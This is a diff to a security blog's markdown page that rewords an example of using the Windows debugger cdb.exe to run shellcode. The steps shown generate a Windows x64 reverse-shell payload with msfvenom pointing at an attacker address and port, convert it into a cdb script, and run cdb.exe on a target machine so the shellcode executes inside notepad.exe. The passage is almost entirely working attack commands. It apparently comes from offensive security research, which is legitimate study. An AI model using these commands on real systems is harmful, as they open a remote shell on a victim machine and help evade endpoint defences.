mrd0x/secblog/src/pages/the-power-of-cdb-debugging-tool/index.md

 ## Example

-1. Generate shellcode using msfvenom
+First Generate shellcode using msfvenom.

     msfvenom -p window/x64/shell_reverse_tcp LHOST=10.0.0.197 LPORT=4444 -f python

-2. Download the aforementioned script and replace the shellcode with yours then run the script
+Next, Download the aforementioned script and replace the shellcode with yours then run the script.

     python3 script.py > test.wds

-3. Send it over to the target machine and use the following command
+Then send it over to the target machine and run the following command

     cdb.exe -pd -cf c:\path\to\payload\test.wds -o notepad.exe

 ![Shellcode-Run](./shellcode_run.gif)